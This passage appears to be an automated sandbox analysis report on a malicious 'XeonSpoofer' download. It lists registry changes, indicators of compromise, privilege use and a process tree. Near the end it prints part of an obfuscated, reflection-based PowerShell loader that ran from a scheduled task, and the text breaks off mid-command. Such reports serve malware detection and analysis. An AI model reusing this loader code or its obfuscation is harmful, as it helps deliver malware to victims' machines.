0000000000000000000000000f50100000000000000000000e8070a00420061007200510065007600690072000a004100620067002000660076007400610072007100200076006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000bfe5616faf18db0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294935296"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\NodeSlot = "5"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "276"	Explorer.EXE

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\XeonSpooferV1.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
772	msedge.exe
772	msedge.exe
5324	msedge.exe
5324	msedge.exe
3796	msedge.exe
3796	msedge.exe
3924	identity_helper.exe
3924	identity_helper.exe
3112	msedge.exe
3112	msedge.exe
3320	msedge.exe
3320	msedge.exe
3320	msedge.exe
3320	msedge.exe
5744	powershell.exe
5744	powershell.exe
5744	powershell.exe
3476	Root + 2 Minute Start Delay.exe
2452	powershell.exe
2452	powershell.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
3476	Root + 2 Minute Start Delay.exe
4944	bsulumhydtcf.exe
5852	powershell.exe
5852	powershell.exe
5852	powershell.exe
5612	powershell.EXE
5612	powershell.EXE
5612	powershell.EXE
4944	bsulumhydtcf.exe
4944	bsulumhydtcf.exe
4944	bsulumhydtcf.exe
4944	bsulumhydtcf.exe
4944	bsulumhydtcf.exe
4944	bsulumhydtcf.exe
4944	bsulumhydtcf.exe
4944	bsulumhydtcf.exe
5612	powershell.EXE
3704	dllhost.exe
3704	dllhost.exe
3704	dllhost.exe
3704	dllhost.exe
3704	dllhost.exe
3704	dllhost.exe
5748	powershell.EXE
5748	powershell.EXE
5748	powershell.EXE
3704	dllhost.exe
3704	dllhost.exe
5748	powershell.EXE
3704	dllhost.exe
3704	dllhost.exe
5748	powershell.EXE
3704	dllhost.exe
3704	dllhost.exe
5748	powershell.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3236	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5744	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeShutdownPrivilege	4400	powercfg.exe
Token: SeCreatePagefilePrivilege	4400	powercfg.exe
Token: SeShutdownPrivilege	6072	powercfg.exe
Token: SeCreatePagefilePrivilege	6072	powercfg.exe
Token: SeShutdownPrivilege	4396	powercfg.exe
Token: SeCreatePagefilePrivilege	4396	powercfg.exe
Token: SeShutdownPrivilege	1152	powercfg.exe
Token: SeCreatePagefilePrivilege	1152	powercfg.exe
Token: SeDebugPrivilege	5852	powershell.exe
Token: SeDebugPrivilege	5612	powershell.EXE
Token: SeShutdownPrivilege	5988	powercfg.exe
Token: SeCreatePagefilePrivilege	5988	powercfg.exe
Token: SeShutdownPrivilege	3116	powercfg.exe
Token: SeCreatePagefilePrivilege	3116	powercfg.exe
Token: SeLockMemoryPrivilege	2416	dialer.exe
Token: SeShutdownPrivilege	3112	powercfg.exe
Token: SeCreatePagefilePrivilege	3112	powercfg.exe
Token: SeShutdownPrivilege	4536	powercfg.exe
Token: SeCreatePagefilePrivilege	4536	powercfg.exe
Token: SeDebugPrivilege	5612	powershell.EXE
Token: SeDebugPrivilege	3704	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe

Suspicious use of SendNotifyMessage 22 IoCs

pid	Process
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE
3236	Explorer.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
6080	XeonSpoofer.exe
5080	xeon.exe
5976	xeon.exe
4180	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5324 wrote to memory of 5436	5324	msedge.exe	77
PID 5324 wrote to memory of 5436	5324	msedge.exe	77
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 6024	5324	msedge.exe	78
PID 5324 wrote to memory of 772	5324	msedge.exe	79
PID 5324 wrote to memory of 772	5324	msedge.exe	79
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80
PID 5324 wrote to memory of 1760	5324	msedge.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:648
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:404
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ec89ecd8-035e-4559-a6c2-6f642b2742ae}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3704
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{930b4845-edf7-44bf-8ee1-0304a2a1c2b3}
  2⤵
  PID:2136
- C:\Windows\system32\LogonUI.exe
  "LogonUI.exe" /flags:0x4 /state0:0xa3a38055 /state1:0x41c64e6d
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
  PID:4180

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nBomMFklgOPf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CgMeWqByvNRgjZ,[Parameter(Position=1)][Type]$lfSCKdjrtD)$hOtvuMOvmrU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+[Char](100)+','+[Char](65)+''+'n'+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+'o'+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hOtvuMOvmrU.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$CgMeWqByvNRgjZ).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+'i'+'m'+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$hOtvuMOvmrU.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+'k'+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+'H'+[Char](105)+'d'+'e'+'By'+'S'+'ig'+','+''+'N'+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+'o'+[Char](116)+''+','+''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+'a'+'l'+'',$lfSCKdjrtD,$CgMeWqByvNRgjZ).SetImplementationFlags('Ru'+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $hOtvuMOvmrU.CreateType();}$pUcfPEsJceBvU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 